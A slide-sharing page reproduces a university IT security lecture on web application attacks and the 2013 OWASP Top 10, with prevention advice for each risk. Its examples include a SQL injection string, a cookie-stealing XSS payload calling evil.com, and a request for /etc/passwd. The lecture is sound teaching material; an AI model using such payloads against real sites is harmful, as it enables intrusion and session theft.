web attacks
play

Web Attacks Summary ITS335: IT Security Sirindhorn International - PowerPoint PPT Presentation

Aug 20, 2023 •268 likes •575 views

ITS335 Web Attacks Web Apps OWASP Top 10 Risks Web Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 February 2014 its335y13s2l10,

  1. ITS335 Web Attacks Web Apps OWASP Top 10 Risks Web Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 February 2014 its335y13s2l10, Steve/Courses/2013/s2/its335/lectures/webattacks.tex, r3123 1/30

  2. ITS335 Contents Web Attacks Web Apps OWASP Web Application Top 10 Risks Summary OWASP OWASP Top 10 Risks Summary 2/30

  3. ITS335 Dynamic Content with Server-Side Processing Web Attacks Web applications often used client- and server-side Web Apps processing to offer dynamic, personalized content to browsers OWASP Top 10 Risks Summary 3/30

  4. ITS335 HTTP is Stateless Web Attacks HTTP designed as stateless protocol Web Apps OWASP Top 10 Risks Summary But web applications often want to maintain state between requests to provide: personalisation, session management, tracking 4/30

  5. ITS335 Personalisation of Responses Web Attacks Web Apps OWASP Top 10 Risks Summary 5/30

  6. ITS335 Managing Login Sessions Web Attacks Web Apps OWASP Top 10 Risks Summary 6/30

  7. ITS335 HTTP Cookies Web Attacks ◮ Cookies are way to implement state with HTTP Web Apps ◮ A cookie is data structure including: OWASP 1. Name Top 10 Risks 2. Value Summary 3. Expiry date/time 4. Path 5. Domain that cookie is valid for 6. Flag to indicate if HTTPS is needed ◮ Common usage of cookies: 1. Web server creates cookie and sends in header field of HTTP response; server often stores session information related to cookie 2. Web browser stores received cookies, and sends in header field of HTTP requests sent to same domain 3. When web server receives a HTTP request with a cookie, it identifies browser by comparing cookie with session information 7/30

  8. ITS335 Cookies for Session Management Web Attacks Web Apps OWASP Top 10 Risks Summary 8/30

  9. ITS335 Issues with Cookies Web Attacks How long should your browser store them? Web Apps OWASP ◮ Session cookies: expiry not set; delete upon close Top 10 Risks ◮ Persistent cookies: expiry date set; delete upon expiry Summary ◮ Allow user to manually delete cookies Which domains should cookies belong to? ◮ 1st party cookie: domain of URL and cookie same ◮ 3rd party cookie: domain of URL and cookie differ ◮ Often used for tracking users; browser privacy settings may disallow 3rd party cookies Can cookies be used with HTTP and HTTPS? ◮ Yes, but browser security policies may disallow it ◮ If Secure flag in cookie is set, can only be used with https 9/30

  10. ITS335 Contents Web Attacks Web Apps OWASP Web Application Top 10 Risks Summary OWASP OWASP Top 10 Risks Summary 10/30

  11. ITS335 The Open Web Application Security Project Web Attacks ◮ OWASP: “Be the thriving global community that drives Web Apps visibility and evolution in the safety and security of the OWASP worlds software.” Top 10 Risks ◮ Global community under not-for-profit OWASP Summary Foundation ◮ All resources open and free ◮ Tutorials, cheat sheets, Top 10, methodologies, APIs, code libraries, testing software, forums, . . . ◮ https://www.owasp.org/ 11/30

  12. ITS335 OWASP Top 10 Web Attacks ◮ 10 most critical web application security risks Web Apps ◮ Released 2003, 2004, 2007, 2010, 2013 OWASP ◮ Collect data from 4 consulting companies and 3 tool Top 10 Risks Summary vendors ◮ 500,000+ vulnerabilities across 100’s of organisations and applications 12/30

  13. ITS335 OWASP Top 10 – 2013 Web Attacks 1. Injection Web Apps 2. Broken Authentication and Session Management OWASP Top 10 Risks 3. Cross-Site Scripting (XSS) Summary 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross-Site Request Forgery (CSRF) 9. Using Known Vulnerable Components 10. Unvalidated Redirects and Forwards 13/30

  14. ITS335 OWASP Top 10 Web Attacks ◮ Most risks are due to poor development and Web Apps configuration practices OWASP ◮ Use secure programming practices Top 10 Risks ◮ Develop and follow standard development procedures Summary ◮ Some risks are due to software vulnerabilities ◮ Be aware of software components in use; upgrade when necessary See OWASP documents for detailed recommendations 14/30

  15. ITS335 Contents Web Attacks Web Apps OWASP Web Application Top 10 Risks Summary OWASP OWASP Top 10 Risks Summary 15/30

  16. ITS335 A1 Injection Web Attacks Example Web Apps OWASP ◮ Application creates query from form inputs: Top 10 Risks SELECT * FROM grades WHERE sid=’$id’ AND Summary cid=’$course’ ◮ Attacker enter form value that causes unintended query to be processed: Course field: its335’ OR ’1’=’1 ◮ Query executed: SELECT * FROM grades WHERE sid=’54123’ AND cid=’its335’ OR ’1’=’1’ ◮ Result: grades of all users/courses are selected 16/30

  17. ITS335 A1 Injection Web Attacks Prevention Web Apps OWASP ◮ Use API that provides parameterized to engine: Top 10 Risks prepared statements, stored procedures Summary ◮ Escape special characters ◮ Use white list for input validation: specify the inputs that are allowed 17/30

  18. ITS335 A2 Broken Authentication and Session Web Attacks Management Web Apps OWASP Example Top 10 Risks ◮ Session IDs are included in URL. If the URL is made Summary available to others, they can log in as user: http://siit.th/grades.php?sessionid=8jdf30d ◮ Timeouts are too long. A user leaves a public computer and others can contiue their session ◮ Attacker gains access to password database and can discover user passwords Prevention ◮ Ensure session IDs are not available via URL, logs, error messages; in HTTP cookies only ◮ Use appropriate password selection and storage mechanisms 18/30

  19. ITS335 A3 Cross-Site Scripting Web Attacks Example Web Apps OWASP ◮ HTML constructed using unvalidated input, e.g.: Top 10 Risks <?php echo $ GET[’name’] ?> Summary ◮ Attacker sets URL to include script to redirect to attackers site: http://siit.th/view.php?name=Steve<script> document.location=’http://evil.com/ stealcookie.php?c=’document.cookie</script> ◮ Script is executed, sending cookie to attackers website Prevention ◮ Escape all untrusted data ◮ White list input validation ◮ Libraries to automatically sanitize input 19/30

  20. ITS335 A4 Insecure Direct Object Reference Web Attacks Example 1 Web Apps OWASP ◮ Web page displays content based on parameter, e.g. Top 10 Risks grades.php shows grades for a particular student user: Summary http://siit.th/grades.php?id=54123 ◮ Attacker modifies parameter to see unauthorised content. E.g. student 54123 sets id to different value to see another students grades: http://siit.th/grades.php?id=54789 Example 2 ◮ file.php shows contents of a file: http://siit.th/file.php?name=lecture.pdf ◮ Attacker modifies parameter to download any file on server: http://siit.th/file.php?name=/etc/passwd 20/30

  21. ITS335 A4 Insecure Direct Object Reference Web Attacks Prevention Web Apps OWASP ◮ Perform access control checks for each requested Top 10 Risks object, e.g. grades.php includes code: Summary if id not userid then cannot access ◮ Use indirect object references. E.g. lecture.pdf is downloaded by link: http://siit.th/file.php?id=05eb939de Application maintains mapping from 05eb939de to lecture.pdf 21/30

  22. ITS335 A5 Security Misconfiguration Web Attacks Examples Web Apps OWASP ◮ Install of server application (e.g. PhpMyAdmin, Moodle, Top 10 Risks Wordpress) includes admin console and examples. They Summary are not removed and default passwords unchanged. ◮ Web server allows directory listings. Visiting the directory allows attacker to download hidden files and source code. ◮ Server applications display debug output, exposing flaws that attacker can take advantage of Prevention ◮ Develop procedure for deploying and testing applications ◮ Deploy patches/upgrades in timely manner ◮ Keep components separate so compromise of one doesn’t compromise others 22/30

  23. ITS335 A6 Sensitive Data Exposure Web Attacks Examples Web Apps OWASP ◮ HTTPS is not used; session cookies for logins are stolen Top 10 Risks by attacker intercepting traffic, allowing them to log in Summary ◮ Passwords are unsalted; a file upload flaw allows attacker to download password file and use rainbow table to find passwords ◮ Confidential info (e.g. credit card numbers) stored in database unencrypted; SQL injection flaw allows attacker to read the info Prevention ◮ Encrypt sensitive data at rest and in transit ◮ Don’t store sensitive data unnecessarily ◮ Store salted hashes of passwords with strong algorithms ◮ Disable autocomplete on forms collecting private info 23/30

  24. ITS335 A7 Missing Function Level Access Control Web Attacks Examples Web Apps OWASP ◮ Attacker browses to target URL that is missing Top 10 Risks appropriate access control Summary http://siit.th/grades/get_phpinfo.php http://siit.th/grades/admin/index.php ◮ Application uses action parameter to perform functions. Attacker can perform actions that are unauthorised http://siit.th/grades?action=edit Prevention ◮ Develop consistent and easy to analyze authentication/authorization module that can be used across application ◮ Deny access by default, explicity grant permissions ◮ Don’t rely on links being hidden 24/30

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

CMPS122: COMPUTER SECURITY NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3 due tonight NETWORKING ATTACKS LAST TIME TCP/IP networking stack Physical layer Data link layer Network

1.1k views • 61 slides
Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22 Overview What is a stream cipher? Classification of attacks Different Attacks Exhaustive Key Search Time Memory Tradeoffs

656 views • 22 slides
Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to penetrate a network by using wireless or evading WLAN access control measures, like AP MAC filters and 802.1X port access controls. Type of Attack

184 views • 7 slides
Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka Savola Introduction Describes a view of ISP backbone network attacks Lots of folks in IETF and elsewhere had quite different ideas whats out

529 views • 9 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr.

Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr.

Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr. Principal Software Engineer 2019/02/19 What are cache based attacks ? In cryptography In cryptographic operations, leaking the internal state of a

338 views • 8 slides
Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks

Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks

Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks require a full- lifecycle approach to email security Paul Roberts, Editor in Chief Speakers Kevin OBrien, CEO 2:00 - 2:05 Introductions,

483 views • 23 slides
CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks

CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks

CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks https://www.reveelium.com/en/ddos-attacks-the-cyber-boogeyman-part-i/ DDoS Attacks 1,700 Gbps!! 2015 :-/

748 views • 20 slides
Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks

Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks

Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks on DNS Denial-of-Service Cache Poisoning Securing DNS Split-Split-DNS DNSSEC 2 DNS The Domain Name System Naming Service

1.15k views • 46 slides
MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( )

MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( )

Software and Web Security 2 MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( ) MitM attack: attacker gets between the browser and the web server, eg eg by setting up a wifi access point

345 views • 9 slides
History of Format String Attacks Format String Attacks

History of Format String Attacks Format String Attacks

History of Format String Attacks Format String Attacks First noted in 1990 as a result of fuzz testing on csh First used as an attack

488 views • 28 slides
pq Outline Description of the FSB Hash Function Classic Attacks Recent Attacks

pq Outline Description of the FSB Hash Function Classic Attacks Recent Attacks

Syndrome Based Collision Resistant Hashing Matthieu Finiasz pq Outline Description of the FSB Hash Function Classic Attacks Recent Attacks Proposed Improvements and Parameters pq 1 Description of the FSB Hash Function pq

286 views • 28 slides
HOST Differential Power Attacks ECE 525 Side-Channel Attacks Cryptographic algorithms assume

HOST Differential Power Attacks ECE 525 Side-Channel Attacks Cryptographic algorithms assume

HOST Differential Power Attacks ECE 525 Side-Channel Attacks Cryptographic algorithms assume that secret keys are utilized by implementations of the algorithm in a secure fashion, with access only allowed through the I/Os Unfortunately,

363 views • 12 slides
A LERTING Daniel Romo Niels van Dijkhuizen BACKGROUND DDoS attacks are commonly seen in

A LERTING Daniel Romo Niels van Dijkhuizen BACKGROUND DDoS attacks are commonly seen in

DD O S D ETECTION AND A LERTING Daniel Romo Niels van Dijkhuizen BACKGROUND DDoS attacks are commonly seen in the SURFnet network Mostly flooding attacks Customers are heavily affected and complain These attacks are cheap and

767 views • 17 slides
Protection of flows Protection of flows under targeted attacks under targeted attacks Jannik

Protection of flows Protection of flows under targeted attacks under targeted attacks Jannik

Protection of flows Protection of flows under targeted attacks under targeted attacks Jannik Matuschke Tom McCormick Gianpaolo Oriolo TU Berlin UBC Vancouver Tor Vergata Britta Peis Martin Skutella RWTH Aachen TU Berlin Robust flows

531 views • 28 slides
Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of

Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of

ITS335 DoS Attacks DoS Attacks Classic DoS Flooding &amp; DDoS Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 August 2013

409 views • 26 slides
ONLINE PRIVACY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Some of the

ONLINE PRIVACY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Some of the

ONLINE PRIVACY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Some of the current Ad ecosystem and problems in online user targeting privacy Solutions for tracking Tracking mechanisms prevention Cookies

737 views • 52 slides
6 Practical Aspects Web Applications Principles and Practice Vincent Simonet, 2014-2015

6 Practical Aspects Web Applications Principles and Practice Vincent Simonet, 2014-2015

Development of 6 Practical Aspects Web Applications Principles and Practice Vincent Simonet, 2014-2015 Vincent Simonet, 2014-2015 Universit Pierre et Marie Curie, Master Informatique, Spcialit STL Universit Pierre et Marie Curie,

1.12k views • 15 slides
CS330 September 14 and 16, 2005 Enterprise Architectures Johannes Gehrke

CS330 September 14 and 16, 2005 Enterprise Architectures Johannes Gehrke

CS330 September 14 and 16, 2005 Enterprise Architectures Johannes Gehrke johannes@cs.cornell.edu http://www.cs.cornell.edu/johannes (Some of the slides are courtesy of Gustavo Alonso, Fabio Casati, Harumi Kuno, Vijay Machiraju and Ethan

597 views • 26 slides
TCP Fast Open Sivasankar Radhakrishnan ! , Yuchung Cheng ! , Jerry Chu ! , Arvind Jain ! ,

TCP Fast Open Sivasankar Radhakrishnan ! , Yuchung Cheng ! , Jerry Chu ! , Arvind Jain ! ,

TCP Fast Open Sivasankar Radhakrishnan ! , Yuchung Cheng ! , Jerry Chu ! , Arvind Jain ! , Barath Raghavan ! ! Google Inc. UC San Diego ! ICSI ACM CoNEXT 2011 8 December 2011 Web Page Load Performance Web transfer latency Web object Avg !

862 views • 19 slides
Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day 2 Today's Agenda 1. Integrate HTTP Request to the app 2. Parse JSON Data 3. Sharing Pro Android S - Day 2 HTTP Request &amp; Response Pro

461 views • 13 slides
Burp Suite and Beyond Automated Scanning vs Manual Tes;ng

Burp Suite and Beyond Automated Scanning vs Manual Tes;ng

Adding Value to Automated Web Scans Burp Suite and Beyond Automated Scanning vs Manual Tes;ng Manual Tes;ng Tools/Suites At MSU -

837 views • 22 slides
6LoWPAN Applications and Internet of Things Reza Khoshdelniat MIMOS Bhd, Malaysia 30 th APAN

6LoWPAN Applications and Internet of Things Reza Khoshdelniat MIMOS Bhd, Malaysia 30 th APAN

6LoWPAN Applications and Internet of Things Reza Khoshdelniat MIMOS Bhd, Malaysia 30 th APAN Meeting Hanoi, Vietnam Outline Internet of things 6LoWPAN MIMOS activities Q&amp;A The Internet of Things Power Company Student Monitoring

498 views • 13 slides
Link layer security CS642: Computer Security Professor

Link layer security CS642: Computer Security Professor

Link layer security CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of Wisconsin CS

606 views • 41 slides

More recommend